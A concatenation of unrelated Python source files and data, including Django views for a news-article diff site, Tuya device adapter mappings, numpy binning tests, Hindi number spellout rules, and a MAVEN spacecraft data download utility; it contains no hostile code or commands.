(75, 93), (75, 94), (75, 95), (75, 97), (75, 102), (75, 104), (75, 105), (75, 106), (75, 107), (75, 108), (75, 109), (75, 110), (75, 111), (75, 112), (75, 113), (75, 114), (75, 115), (75, 118), (75, 120), (76, 84), (76, 86), (76, 87), (76, 89), (76, 90), (76, 91), (76, 92), (76, 93), (76, 94), (76, 95), (76, 97), (76, 102), (76, 104), (76, 105), (76, 106), (76, 107), (76, 108), (76, 109), (76, 110), (76, 111), (76, 112), (76, 113), (76, 114), (76, 117), (76, 118), (76, 119), (76, 121), (77, 83), (77, 85), (77, 86), (77, 87), (77, 88), (77, 91), (77, 92), (77, 93), (77, 94), (77, 95), (77, 96), (77, 98), (77, 103), (77, 106), (77, 107), (77, 108), (77, 109), (77, 110), (77, 111), (77, 112), (77, 113), (77, 114), (77, 115), (77, 116), (77, 117), (77, 118),
(77, 119), (77, 121), (78, 83), (78, 85), (78, 86), (78, 87), (78, 88), (78, 89), (78, 90), (78, 91), (78, 92), (78, 93), (78, 94), (78, 95), (78, 98), (78, 104), (78, 107), (78, 108), (78, 109), (78, 110), (78, 111), (78, 112), (78, 113), (78, 114), (78, 115), (78, 116), (78, 117), (78, 118), (78, 119), (78, 120), (78, 121), (78, 122), (79, 82), (79, 84), (79, 85), (79, 86), (79, 87), (79, 88), (79, 89), (79, 90), (79, 91), (79, 92), (79, 93), (79, 97), (79, 106), (79, 108), (79, 109), (79, 110), (79, 111), (79, 112), (79, 113), (79, 114), (79, 115), (79, 116), (79, 117), (79, 118), (79, 119), (79, 120), (79, 122), (80, 81), (80, 83), (80, 84), (80, 85), (80, 86), (80, 87), (80, 88), (80, 89), (80, 90), (80, 91), (80, 94), (80, 95), (80, 107),
(80, 109), (80, 110), (80, 111), (80, 112), (80, 113), (80, 114), (80, 115), (80, 116), (80, 117), (80, 118), (80, 119), (80, 121), (81, 81), (81, 93), (81, 108), (81, 110), (81, 111), (81, 112), (81, 113), (81, 114), (81, 115), (81, 116), (81, 117), (81, 118), (81, 119), (81, 121), (82, 81), (82, 84), (82, 85), (82, 86), (82, 87), (82, 88), (82, 89), (82, 90), (82, 108), (82, 110), (82, 111), (82, 112), (82, 113), (82, 114), (82, 115), (82, 116), (82, 117), (82, 118), (82, 120), (83, 80), (83, 82), (83, 101), (83, 103), (83, 108), (83, 110), (83, 111), (83, 112), (83, 113), (83, 114), (83, 115), (83, 116), (83, 117), (83, 119), (84, 80), (84, 82), (84, 105), (84, 108), (84, 109), (84, 110), (84, 111), (84, 112), (84, 113), (84, 114), (84, 115), (84, 116), (84, 117),
(84, 119), (85, 80), (85, 82), (85, 100), (85, 102), (85, 103), (85, 106), (85, 108), (85, 109), (85, 110), (85, 111), (85, 112), (85, 113), (85, 114), (85, 115), (85, 116), (85, 118), (86, 80), (86, 82), (86, 93), (86, 99), (86, 101), (86, 102), (86, 103), (86, 104), (86, 105), (86, 108), (86, 109), (86, 110), (86, 111), (86, 112), (86, 113), (86, 114), (86, 115), (86, 117), (87, 80), (87, 83), (87, 88), (87, 89), (87, 90), (87, 91), (87, 93), (87, 99), (87, 101), (87, 102), (87, 103), (87, 104), (87, 105), (87, 106), (87, 107), (87, 108), (87, 109), (87, 110), (87, 111), (87, 112), (87, 113), (87, 114), (87, 116), (88, 81), (88, 83), (88, 84), (88, 85), (88, 86), (88, 90), (88, 93), (88, 99), (88, 102), (88, 103), (88, 104), (88, 105), (88, 106), (88, 107),
(88, 108), (88, 109), (88, 110), (88, 111), (88, 112), (88, 113), (88, 115), (89, 94), (89, 101), (89, 114), (90, 94), (90, 102), (90, 103), (90, 104), (90, 105), (90, 106), (90, 107), (90, 108), (90, 109), (90, 110), (90, 111), (90, 113), (91, 94), (92, 94), (93, 94), (94, 94), (95, 93), (96, 92), (96, 93), (97, 93), (98, 92), (98, 93), )
coordinates_6395ED = ((127, 124),
(128, 123), (128, 124), (129, 123), (129, 125), (130, 123), (130, 126), (131, 123), (131, 126), (132, 122), (132, 124), (132, 125), (132, 127), (133, 122), (133, 124), (133, 125), (133, 127), (134, 122), (134, 124), (134, 125), (134, 126), (134, 127), (135, 123), (135, 125), (135, 126), (135, 128), (136, 124), (136, 126), (136, 128), (137, 124), (137, 126), (137, 128), (138, 124), (138, 126), (138, 128), (139, 125), (139, 128), (140, 125), (140, 128), (141, 125), (141, 128), (142, 125), (142, 127), (143, 125), (143, 127), (144, 125), (144, 127), (145, 125), (145, 126), )
coordinates_00FFFE = ((145, 142),
(146, 140), (146, 142), (147, 137), (147, 143), (148, 136), (148, 139), (148, 140), (148, 141), (148, 142), (148, 144), (149, 135), (149, 137), (149, 142), (149, 144), (150, 134), (150, 136), (150, 142), (150, 144), (151, 133), (151, 135), (151, 141), (151, 144), (152, 131), (152, 133), (152, 140), (152, 142), (152, 144), (153, 139), (153, 141), (153, 142), (153, 144), (154, 139), (154, 141), (154, 145), (155, 138), (155, 143), (155, 145), (156, 138), (156, 140), (156, 141), (156, 144), (156, 146), (157, 145), (158, 146), (158, 147), (159, 146), (159, 147), (160, 145), (160, 148), (161, 143), (161, 146), (161, 148), (162, 141), (162, 145), (162, 146), (162, 148), (163, 143), (163, 147), (164, 144), (164, 146), )
coordinates_B4E7FA = ((120, 146),
(120, 148), (120, 149), (120, 150), (121, 146), (121, 153), (122, 147), (122, 149), (122, 150), (122, 151), (122, 153), (123, 148), (123, 150), (123, 151), (123, 153), (124, 148), (124, 150), (124, 151), (124, 153), (125, 147), (125, 153), (126, 146), (126, 148), (126, 149), (126, 150), (126, 152), )
coordinates_F98072 = ((129, 121),
(130, 120), (130, 121), (131, 118), (131, 120), (132, 117), (132, 120), (133, 117), (133, 120), (134, 117), (134, 119), (135, 119), (136, 118), (137, 119), (137, 120), (138, 119), (138, 120), (139, 120), (140, 120), (141, 120), (142, 120), (143, 119), (143, 120), (144, 119), (145, 118), (146, 117), (146, 118), (147, 117), )
coordinates_97FB98 = ((154, 118),
(155, 118), (155, 119), (156, 118), (157, 119), (157, 120), (158, 119), (158, 121), (159, 120), (159, 121), (160, 121), (160, 122), (161, 121), (161, 124), (161, 126), (162, 121), (162, 127), (162, 133), (163, 121), (163, 123), (163, 124), (163, 125), (163, 126), (163, 128), (163, 133), (163, 136), (164, 121), (164, 122), (164, 128), (164, 133), (164, 137), (165, 129), (165, 133), (165, 135), (165, 138), (165, 141), (165, 143), (166, 129), (166, 134), (166, 136), (166, 140), (166, 143), (166, 145), (167, 129), (167, 134), (167, 136), (167, 137), (167, 138), (167, 140), (167, 143), (167, 145), (168, 129), (168, 135), (168, 145), (169, 128), (169, 129), (169, 136), (169, 138), (169, 139), (169, 140), (169, 141), (169, 142), (169, 143), (169, 145), (170, 128), (171, 128), (172, 128), (172, 133), (173, 128), (173, 132), (173, 133), (174, 128), (174, 132),
(175, 128), (175, 131), (176, 128), (176, 131), (177, 128), (177, 130), (178, 130), )
coordinates_323287 = ((154, 111),
(154, 113), (154, 114), (154, 115), (154, 116), (155, 101), (155, 114), (156, 104), (156, 110), (156, 112), (157, 102), (157, 106), (157, 109), (157, 111), (158, 103), (158, 111), (159, 104), (159, 107), (159, 109), (159, 111), (160, 105), (160, 110), (161, 107), (161, 109), )
coordinates_6495ED = ((100, 126),
(100, 127), (101, 126), (101, 128), (102, 126), (102, 128), (103, 126), (103, 128), (104, 126), (104, 129), (105, 125), (105, 128), (106, 125), (106, 126), (106, 128), (107, 125), (107, 128), (108, 125), (108, 128), (109, 125), (109, 128), (110, 125), (110, 127), (111, 125), (111, 127), (112, 125), (112, 126), (113, 126), (114, 126), (115, 125), (116, 124), (117, 124), )
coordinates_01FFFF = ((79, 153),
(80, 149), (80, 150), (80, 153), (81, 148), (81, 152), (82, 146), (82, 149), (82, 150), (82, 152), (83, 145), (83, 147), (83, 148), (83, 149), (83, 150), (83, 152), (84, 144), (84, 149), (84, 151), (85, 142), (85, 148), (85, 151), (86, 140), (86, 147), (86, 150), (87, 138), (87, 146), (87, 148), (87, 150), (88, 145), (88, 147), (88, 149), (89, 144), (89, 146), (89, 147), (89, 149), (90, 143), (90, 145), (90, 146), (90, 148), (91, 142), (91, 147), (92, 141), (92, 143), (92, 144), (92, 145), (92, 147), (93, 140), (93, 142), (93, 143), (94, 134), (94, 140), (94, 143), (95, 135), (95, 136), (95, 140), (95, 143), (96, 135), (96, 137), (96, 138), (96, 139), (96, 140), (96, 141), (96, 142), (96, 144), (97, 136), (97, 139), (97, 140), (97, 141), (97, 142), (97, 143), (98, 136), (98, 139),
(98, 140), (98, 141), (98, 143), (99, 138), (99, 143), (100, 140), (100, 142), )
|
py | 7df7bd4b2f0855e907e03b59b0c0028033614074 | from app import app
if __name__ == '__main__':
app.run(debug=True) |
py | 7df7be0857a9ed6a689fb54be35df5986294fb4f |
import functools
import os.path
from decorator import decorator
from django import http
from django.conf import settings as dsettings
from django.forms.utils import ErrorDict
from django.shortcuts import render
from common.jsonify import json_dumps
def render_to_json(f): # pragma: no cover
"""
Decorator to be applied to a view to serialize json in the result.
"""
@functools.wraps(f)
def wrapper(func, *args, **kw):
if dsettings.DEBUG:
ct = 'text/plain'
j = lambda d: json_dumps(d, indent=2)
else:
ct = 'application/json'
j = json_dumps
try:
result = func(*args, **kw)
except Exception as e:
result = j(str(e))
status = 500
else:
if isinstance(result, http.HttpResponse):
return result
else:
result = j(result)
status = 200 if not isinstance(result, ErrorDict) else 400
return http.HttpResponse(content = result, content_type = ct, status = status)
return decorator(wrapper, f)
# see: http://www.djangosnippets.org/snippets/821/
def render_to_template(template): # pragma: no cover
"""
Decorator for Django views that sends returned dict to render_to_response function
with given template and RequestContext as context instance.
If view doesn't return dict then decorator simply returns output.
Additionally view can return two-tuple, which must contain dict as first
element and string with template name as second. This string will
override template name, given as parameter
Parameters:
- template: template name to use
"""
def renderer(func):
@functools.wraps(func)
def wrapper(request, *args, **kw):
output = func(request, *args, **kw)
if isinstance(output, (list, tuple)):
output, tpl = output
else:
tpl = template
ct = 'text/html'
if tpl.endswith('xml'):
ct = 'text/xml' if dsettings.DEBUG else 'application/xml'
if isinstance(output, dict):
if request.is_ajax():
tpl = ('%s_body%s' % os.path.splitext(tpl), tpl)
return render(request, tpl, output, content_type=ct)
else:
return output
return wrapper
return renderer
|
py | 7df7be6d3f42fd56e2878441cec2c130b9d34e58 | import datetime
import re
from django.shortcuts import render_to_response, get_object_or_404, redirect
from models import Article, Version
import models
import json
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.core.urlresolvers import reverse
import urllib
import django.db
import time
from django.template import Context, RequestContext, loader
from django.views.decorators.cache import cache_page
OUT_FORMAT = '%B %d, %Y at %l:%M%P EDT'
SEARCH_ENGINES = """
http://www.ask.com
http://www.google
https://www.google
search.yahoo.com
http://www.bing.com
""".split()
def came_from_search_engine(request):
return any(x in request.META.get('HTTP_REFERER', '')
for x in SEARCH_ENGINES)
def Http400():
t = loader.get_template('404.html')
return HttpResponse(t.render(Context()), status=400)
def get_first_update(source):
if source is None:
source = ''
updates = models.Article.objects.order_by('last_update').filter(last_update__gt=datetime.datetime(1990, 1, 1, 0, 0),
url__contains=source)
try:
return updates[0].last_update
except IndexError:
return datetime.datetime.now()
def get_last_update(source):
if source is None:
source = ''
updates = models.Article.objects.order_by('-last_update').filter(last_update__gt=datetime.datetime(1990, 1, 1, 0, 0), url__contains=source)
try:
return updates[0].last_update
except IndexError:
return datetime.datetime.now()
def get_articles(source=None, distance=0):
articles = []
rx = re.compile(r'^https?://(?:[^/]*\.)%s/' % source if source else '')
pagelength = datetime.timedelta(days=1)
end_date = datetime.datetime.now() - distance * pagelength
start_date = end_date - pagelength
print 'Asking query'
version_query = '''SELECT
version.id, version.article_id, version.v, version.title,
version.byline, version.date, version.boring, version.diff_json,
T.age as age,
Articles.url as a_url, Articles.initial_date as a_initial_date,
Articles.last_update as a_last_update, Articles.last_check as a_last_check
FROM version,
(SELECT Articles.id as article_id, MAX(T3.date) AS age, COUNT(T3.id) AS num_vs
FROM Articles LEFT OUTER JOIN version T3 ON (Articles.id = T3.article_id)
WHERE (T3.boring=0) GROUP BY Articles.id
HAVING (age > %s AND age < %s AND num_vs > 1 )) T, Articles
WHERE (version.article_id = Articles.id) and
(version.article_id = T.article_id) and
NOT version.boring
ORDER BY date'''
all_versions = models.Version.objects.raw(version_query,
(start_date, end_date))
article_dict = {}
for v in all_versions:
a=models.Article(id=v.article_id,
url=v.a_url, initial_date=v.a_initial_date,
last_update=v.a_last_update, last_check=v.a_last_check)
v.article = a
article_dict.setdefault(v.article, []).append(v)
for article, versions in article_dict.items():
url = article.url
if not rx.match(url):
print 'REJECTING', url
continue
if 'blogs.nytimes.com' in url: #XXX temporary
continue
if len(versions) < 2:
continue
rowinfo = get_rowinfo(article, versions)
articles.append((article, versions[-1], rowinfo))
print 'Queries:', len(django.db.connection.queries), django.db.connection.queries
articles.sort(key = lambda x: x[-1][0][1].date, reverse=True)
return articles
SOURCES = '''nytimes.com cnn.com politico.com washingtonpost.com
bbc.co.uk'''.split()
@cache_page(60 * 30) #30 minute cache
def browse(request, source=''):
if source not in SOURCES + ['']:
raise Http404
pagestr=request.REQUEST.get('page', '1')
try:
page = int(pagestr)
except ValueError:
page = 1
first_update = get_first_update(source)
num_pages = (datetime.datetime.now() - first_update).days + 1
page_list=range(1, 1+num_pages)
articles = get_articles(source=source, distance=page-1)
return render_to_response('browse.html', {
'source': source, 'articles': articles,
'page':page,
'page_list': page_list,
'first_update': first_update,
'sources': SOURCES
})
@cache_page(60 * 30) #30 minute cache
def feed(request, source=''):
if source not in SOURCES + ['']:
raise Http404
pagestr=request.REQUEST.get('page', '1')
try:
page = int(pagestr)
except ValueError:
page = 1
first_update = get_first_update(source)
last_update = get_last_update(source)
num_pages = (datetime.datetime.now() - first_update).days + 1
page_list=range(1, 1+num_pages)
articles = get_articles(source=source, distance=page-1)
return render_to_response('feed.xml', {
'source': source, 'articles': articles,
'page':page,
'request':request,
'page_list': page_list,
'last_update': last_update,
'sources': SOURCES
},
context_instance=RequestContext(request),
mimetype='application/atom+xml')
def old_diffview(request):
"""Support for legacy diff urls"""
url = request.REQUEST.get('url')
v1tag = request.REQUEST.get('v1')
v2tag = request.REQUEST.get('v2')
if url is None or v1tag is None or v2tag is None:
return HttpResponseRedirect(reverse(front))
try:
v1 = Version.objects.get(v=v1tag)
v2 = Version.objects.get(v=v2tag)
except Version.DoesNotExist:
return Http400()
try:
article = Article.objects.get(url=url)
except Article.DoesNotExist:
return Http400()
return redirect(reverse('diffview', kwargs=dict(vid1=v1.id,
vid2=v2.id,
urlarg=article.filename())),
permanent=True)
def diffview(request, vid1, vid2, urlarg):
# urlarg is unused, and only for readability
# Could be strict and enforce urlarg == article.filename()
try:
v1 = Version.objects.get(id=int(vid1))
v2 = Version.objects.get(id=int(vid2))
except Version.DoesNotExist:
raise Http404
article = v1.article
if v1.article != v2.article:
raise Http404
title = article.latest_version().title
versions = dict(enumerate(article.versions()))
adjacent_versions = []
dates = []
texts = []
for v in (v1, v2):
texts.append(v.text())
dates.append(v.date.strftime(OUT_FORMAT))
indices = [i for i, x in versions.items() if x == v]
if not indices:
#One of these versions doesn't exist / is boring
return Http400()
index = indices[0]
adjacent_versions.append([versions.get(index+offset)
for offset in (-1, 1)])
if any(x is None for x in texts):
return Http400()
links = []
for i in range(2):
if all(x[i] for x in adjacent_versions):
diffl = reverse('diffview', kwargs=dict(vid1=adjacent_versions[0][i].id,
vid2=adjacent_versions[1][i].id,
urlarg=article.filename()))
links.append(diffl)
else:
links.append('')
return render_to_response('diffview.html', {
'title': title,
'date1':dates[0], 'date2':dates[1],
'text1':texts[0], 'text2':texts[1],
'prev':links[0], 'next':links[1],
'article_shorturl': article.filename(),
'article_url': article.url, 'v1': v1, 'v2': v2,
'display_search_banner': came_from_search_engine(request),
})
def get_rowinfo(article, version_lst=None):
if version_lst is None:
version_lst = article.versions()
rowinfo = []
lastv = None
urlarg = article.filename()
for version in version_lst:
date = version.date
if lastv is None:
diffl = ''
else:
diffl = reverse('diffview', kwargs=dict(vid1=lastv.id,
vid2=version.id,
urlarg=urlarg))
rowinfo.append((diffl, version))
lastv = version
rowinfo.reverse()
return rowinfo
def prepend_http(url):
"""Return a version of the url that starts with the proper scheme.
url may look like
www.nytimes.com
https:/www.nytimes.com <- because double slashes get stripped
http://www.nytimes.com
"""
components = url.split('/', 2)
if len(components) < 2 or '.' in components[0]:
components = ['http:', '']+components
elif components[1]:
components[1:1] = ['']
return '/'.join(components)
def article_history(request, urlarg=''):
url = request.REQUEST.get('url') # this is the deprecated interface.
if url is None:
url = urlarg
if len(url) == 0:
return HttpResponseRedirect(reverse(front))
url = url.split('?')[0] #For if user copy-pastes from news site
url = prepend_http(url)
try:
article = Article.objects.get(url=url)
except Article.DoesNotExist:
return render_to_response('article_history_missing.html', {'url': url})
if len(urlarg) == 0:
return HttpResponseRedirect(reverse(article_history, args=[article.filename()]))
rowinfo = get_rowinfo(article)
return render_to_response('article_history.html', {'article':article,
'versions':rowinfo,
'display_search_banner': came_from_search_engine(request),
})
def article_history_feed(request, url=''):
url = prepend_http(url)
article = get_object_or_404(Article, url=url)
rowinfo = get_rowinfo(article)
return render_to_response('article_history.xml',
{ 'article': article,
'versions': rowinfo,
'request': request,
},
context_instance=RequestContext(request),
mimetype='application/atom+xml')
def json_view(request, vid):
version = get_object_or_404(Version, id=int(vid))
data = dict(
title=version.title,
byline = version.byline,
date = version.date.isoformat(),
text = version.text(),
)
return HttpResponse(json.dumps(data), mimetype="application/json")
def upvote(request):
article_url = request.REQUEST.get('article_url')
diff_v1 = request.REQUEST.get('diff_v1')
diff_v2 = request.REQUEST.get('diff_v2')
remote_ip = request.META.get('REMOTE_ADDR')
article_id = Article.objects.get(url=article_url).id
models.Upvote(article_id=article_id, diff_v1=diff_v1, diff_v2=diff_v2, creation_time=datetime.datetime.now(), upvoter_ip=remote_ip).save()
return render_to_response('upvote.html')
def about(request):
return render_to_response('about.html', {})
def examples(request):
return render_to_response('examples.html', {})
def contact(request):
return render_to_response('contact.html', {})
def front(request):
return render_to_response('front.html', {'sources': SOURCES})
def subscribe(request):
return render_to_response('subscribe.html', {})
def press(request):
return render_to_response('press.html', {})
|
py | 7df7bedab41ab8d24688e577f867ab52703a7d05 | from adapters.on_off_switch_adapter import OnOffSwitchAdapter
from adapters.generic.blind_adapter import BlindAdapter
from adapters.generic.plug import PlugAdapter
from adapters.generic.temp_hum_sensor import TemperatureHumiditySensorAdapter
from adapters.tuya.TS0002 import TS0002
from adapters.tuya.TS0012 import TS0012
from adapters.tuya.TS0013 import TS0013
from adapters.tuya.TS0015 import TS0015
from adapters.tuya.TS0041 import TS0041
from adapters.tuya.TS0601 import TS0601
tuya_adapters = {
'TS0121': OnOffSwitchAdapter, # TuYa 10A UK or 16A EU smart plug
'TS0121_plug': PlugAdapter, # TuYa 10A UK or 16A EU smart plug
'TS0121_switch': OnOffSwitchAdapter, # TuYa Smart light switch module (1 gang)
'TS0201': TemperatureHumiditySensorAdapter, # TuYa Temperature & humidity sensor with display
'TS0002': TS0002, # TuYa 2 gang switch
'TS0011': OnOffSwitchAdapter, # TuYa Smart light switch - 1 gang without neutral wire
'TS0012': TS0012, # TuYa Smart light switch - 2 gang without neutral wire
'TS0013': TS0013, # TuYa Smart light switch - 3 gang without neutral wire
'TS0015': TS0015, # TuYa Multiprise with 4 AC outlets and 2 USB super charging ports (10A or 16A)
'TS0041': TS0041, # TuYa Wireless switch with 1 button
'TS0601_curtain': BlindAdapter, # TuYa Curtain motor
'TS0601_thermostat': TS0601, # TuYa Radiator valve with thermostat
'mcdj3aq': BlindAdapter, # TuYa Tubular motor
'TS130F': BlindAdapter, # TuYa Curtain / Blind switch
}
|
py | 7df7bf65748a15da15f95fd5eb9871ce8723e6bf | from __future__ import absolute_import, division, print_function
import numpy as np
import pytest
from numpy.testing import assert_array_equal
from .. import binning
@pytest.mark.parametrize(
('centers', 'ref'),
[(np.arange(10, 20, dtype=np.float), np.arange(9.5, 20)),
(2.0 ** np.arange(1, 10), [1, 3, 6, 12, 24, 48, 96, 192, 384, 640])])
def test_calculate_bin_edges(centers, ref):
"""Test bin edges calculated for an evenly and an unevenly spaced
set of centers.
"""
assert_array_equal(binning.calculate_bin_edges(centers), ref)
@pytest.mark.parametrize(
('edges', 'widths', 'centers'),
[([1, 2, 4, 10, 20], [1, 2, 6, 10], [1.5, 2.5, 5.5, 14.5]),
([1, 2], [1], [1.5])])
def test_calculate_bins(edges, widths, centers):
"""Test a normal case and an edge case with only one bin."""
assert_array_equal(binning.calculate_bin_widths(edges), widths)
assert_array_equal(binning.calculate_bin_centers(edges), centers)
def test_center_edge_center_roundtrip():
"""
Test that we can start with centers and roundtrip to the same centers.
"""
centers = [1, 2, 4, 10, 20]
calc_edges = binning.calculate_bin_edges(centers)
calc_centers = binning.calculate_bin_centers(calc_edges)
assert_array_equal(calc_centers, centers)
@pytest.mark.parametrize('a', [np.arange(20).reshape((4, 5)), np.array([5])])
def test_calculate_bin_raises(a):
"""Test we get a ValueError with a non-1D or scalar array."""
with pytest.raises(ValueError):
binning.calculate_bin_edges(a)
with pytest.raises(ValueError):
binning.calculate_bin_widths(a)
with pytest.raises(ValueError):
binning.calculate_bin_centers(a)
|
py | 7df7bff03cb9bc10f5d99493abfc615e49d7215c | # -*- coding: utf-8 -*-
info = {
"%spellout-cardinal": {
"0": "शून्य;",
"1": "एक;",
"2": "दो;",
"3": "तीन;",
"4": "चार;",
"5": "पाँच;",
"6": "छह;",
"7": "सात;",
"8": "आठ;",
"9": "नौ;",
"10": "दस;",
"11": "ग्यारह;",
"12": "बारह;",
"13": "तेरह;",
"14": "चौदह;",
"15": "पन्द्रह;",
"16": "सोलह;",
"17": "सत्रह;",
"18": "अठारह;",
"19": "उन्नीस;",
"20": "बीस;",
"21": "इक्कीस;",
"22": "बाईस;",
"23": "तेईस;",
"24": "चौबीस;",
"25": "पच्चीस;",
"26": "छब्बीस;",
"27": "सत्ताईस;",
"28": "अट्ठाईस;",
"29": "उनतीस;",
"30": "तीस;",
"31": "इकतीस;",
"32": "बत्तीस;",
"33": "तैंतीस;",
"34": "चौंतीस;",
"35": "पैंतीस;",
"36": "छत्तीस;",
"37": "सैंतीस;",
"38": "अड़तीस;",
"39": "उनतालीस;",
"40": "चालीस;",
"41": "इकतालीस;",
"42": "बयालीस;",
"43": "तैंतालीस;",
"44": "चौवालीस;",
"45": "पैंतालीस;",
"46": "छियालीस;",
"47": "सैंतालीस;",
"48": "अड़तालीस;",
"49": "उनचास;",
"50": "पचास;",
"51": "इक्यावन;",
"52": "बावन;",
"53": "तिरेपन;",
"54": "चौवन;",
"55": "पचपन;",
"56": "छप्पन;",
"57": "सत्तावन;",
"58": "अट्ठावन;",
"59": "उनसठ;",
"60": "साठ;",
"61": "इकसठ;",
"62": "बासठ;",
"63": "तिरेसठ;",
"64": "चौंसठ;",
"65": "पैंसठ;",
"66": "छियासठ;",
"67": "सड़सठ;",
"68": "अड़सठ;",
"69": "उनहत्तर;",
"70": "सत्तर;",
"71": "इकहत्तर;",
"72": "बहत्तर;",
"73": "तिहत्तर;",
"74": "चौहत्तर;",
"75": "पचहत्तर;",
"76": "छिहत्तर;",
"77": "सतहत्तर;",
"78": "अठहत्तर;",
"79": "उनासी;",
"80": "अस्सी;",
"81": "इक्यासी;",
"82": "बयासी;",
"83": "तिरासी;",
"84": "चौरासी;",
"85": "पचासी;",
"86": "छियासी;",
"87": "सत्तासी;",
"88": "अट्ठासी;",
"89": "नवासी;",
"90": "नब्बे;",
"91": "इक्यानबे;",
"92": "बानबे;",
"93": "तिरानबे;",
"94": "चौरानबे;",
"95": "पंचानबे;",
"96": "छियानबे;",
"97": "सत्तानबे;",
"98": "अट्ठानबे;",
"99": "निन्यानबे;",
"(100, 999)": "<< सौ[ >>];",
"(1000, 99999)": "<< हज़ार[ >>];",
"(100000, 9999999)": "<< लाख[ >>];",
"(10000000, 999999999)": "<< करोड़[ >>];",
"(1000000000, 99999999999)": "<< अरब[ >>];",
"(100000000000, 999999999999999999)": "<< खरब[ >>];",
"(1000000000000000000, 'inf')": "=#,##,##0=;"
},
"%spellout-numbering": {
"(0, 'inf')": "=%spellout-cardinal=;"
},
"%spellout-numbering-year": {
"(0, 'inf')": "=%spellout-numbering=;"
},
"%spellout-ordinal-feminine": {
"0": "शून्यवी;",
"1": "पहली;",
"2": "दूसरी;",
"3": "तीसरी;",
"4": "चौथी;",
"5": "पाँचवी;",
"6": "छठी;",
"(7, 'inf')": "=%spellout-cardinal=वी;"
},
"%spellout-ordinal-masculine": {
"0": "शून्यवाँ;",
"1": "पहला;",
"2": "दूसरा;",
"3": "तीसरा;",
"4": "चौथा;",
"5": "पाँचवाँ;",
"6": "छठा;",
"(7, 'inf')": "=%spellout-cardinal=वाँ;"
}
} |
py | 7df7c0b736859f61815c91debd1f1d506837e0a0 | from django.db.models import EmailField
from zoogle.core.models import BaseModel
class Zmail(BaseModel):
from_addr = EmailField()
to_addr = EmailField()
|
py | 7df7c1a68c5e7560c0dc86b29340240c35083cb6 | from microservice import SeldonMicroserviceException
import json
COUNTER = "COUNTER"
GAUGE = "GAUGE"
TIMER = "TIMER"
def create_counter(key,value):
test = value + 1
return {"key":key,"type":COUNTER,"value":value}
def create_gauge(key,value):
test = value + 1
return {"key":key,"type":GAUGE,"value":value}
def create_timer(key,value):
test = value + 1
return {"key":key,"type":TIMER,"value":value}
def validate_metrics(metrics):
if isinstance(metrics, (list,)):
for metric in metrics:
if not ("key" in metric and "value" in metric and "type" in metric):
return False
if not (metric["type"] == COUNTER or metric["type"] == GAUGE or metric["type"] == TIMER):
return False
try:
metric["value"] + 1
except TypeError:
return False
else:
return False
return True
def get_custom_metrics(component):
if hasattr(component,"metrics"):
metrics = component.metrics()
if not validate_metrics(metrics):
jStr = json.dumps(metrics)
raise SeldonMicroserviceException("Bad metric created during request: "+jStr,reason="MICROSERVICE_BAD_METRIC")
return metrics
else:
return None
|
py | 7df7c1a95d22d2d7c095be243708fbc5ab133dde | # -*- coding: utf-8 -*-
"""
File:
download_file_utilities.py
Description:
Functions used by maven_load.
"""
uname = ''
pword = ''
from .utilities import l2_regex, kp_regex
def get_filenames(query, public):
import urllib
public_url = 'https://lasp.colorado.edu/maven/sdc/public/files/api/v1/search/science/fn_metadata/file_names' + \
'?' + query
private_url = 'https://lasp.colorado.edu/maven/sdc/service/files/api/v1/search/science/fn_metadata/file_names' + \
'?' + query
if not public:
username = uname
password = pword
p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, private_url, username, password)
handler = urllib.request.HTTPBasicAuthHandler(p)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener)
page = urllib.request.urlopen(private_url)
else:
page = urllib.request.urlopen(public_url)
return page.read().decode("utf-8")
def get_file_from_site(filename, public, data_dir):
import os
import urllib
public_url = 'https://lasp.colorado.edu/maven/sdc/public/files/api/v1/search/science/fn_metadata/download' + '?file=' + filename
private_url = 'https://lasp.colorado.edu/maven/sdc/service/files/api/v1/search/science/fn_metadata/download' + '?file=' + filename
if not public:
username = uname
password = pword
p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, private_url, username, password)
handler = urllib.request.HTTPBasicAuthHandler(p)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener)
page = urllib.request.urlopen(private_url)
else:
page = urllib.request.urlopen(public_url)
with open(os.path.join(data_dir, filename), "wb") as code:
code.write(page.read())
return
def get_orbit_files():
import os
import urllib
import re
orbit_files_url = "http://naif.jpl.nasa.gov/pub/naif/MAVEN/kernels/spk/"
pattern = 'maven_orb_rec(\.orb|.{17}\.orb)'
page = urllib.request.urlopen(orbit_files_url)
page_string = str(page.read())
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
orbit_files_path = os.path.join(toolkit_path, "orbitfiles")
if not os.path.exists(orbit_files_path):
os.mkdir(orbit_files_path)
for matching_pattern in re.findall(pattern, page_string):
filename = "maven_orb_rec" + matching_pattern
o_file = urllib.request.urlopen(orbit_files_url + filename)
with open(os.path.join(orbit_files_path, filename), "wb") as code:
code.write(o_file.read())
merge_orbit_files()
return
def merge_orbit_files():
import os
import re
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
orbit_files_path = os.path.join(toolkit_path, "orbitfiles")
pattern = 'maven_orb_rec(_|)(|.{6})(|_.{9}).orb'
orb_dates = []
orb_files = []
for f in os.listdir(orbit_files_path):
x = re.match(pattern, f)
if x is not None:
orb_files.append(os.path.join(orbit_files_path, f))
if x.group(2) != '':
orb_dates.append(x.group(2))
else:
orb_dates.append('999999')
sorted_files = [x for (y, x) in sorted(zip(orb_dates, orb_files))]
with open(os.path.join(toolkit_path, 'maven_orb_rec.orb'), "w") as code:
skip_2_lines = False
for o_file in sorted_files:
with open(o_file) as f:
if skip_2_lines:
f.readline()
f.readline()
skip_2_lines = True
code.write(f.read())
return
def get_access():
import os
toolkit_path = os.path.dirname(__file__)
with open(os.path.join(toolkit_path, 'access.txt'), 'r') as f:
f.readline()
s = f.readline().rstrip()
s = s.split(' ')
if s[1] == '1':
return False
else:
return True
def get_root_data_dir():
import pyspedas
# Get preferred data download location for pyspedas project
prefs = pyspedas.get_spedas_prefs()
if 'data_dir' in prefs:
download_path = prefs['data_dir']
else:
raise NameError('data_dir is not found in spd_prefs.txt')
import os
# Get the "toolkit path" (where MAVEN download code is)
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
if not os.path.exists(os.path.join(toolkit_path, 'mvn_toolkit_prefs.txt')):
create_pref_file(toolkit_path, download_path)
with open(os.path.join(toolkit_path, 'mvn_toolkit_prefs.txt'), 'r') as f:
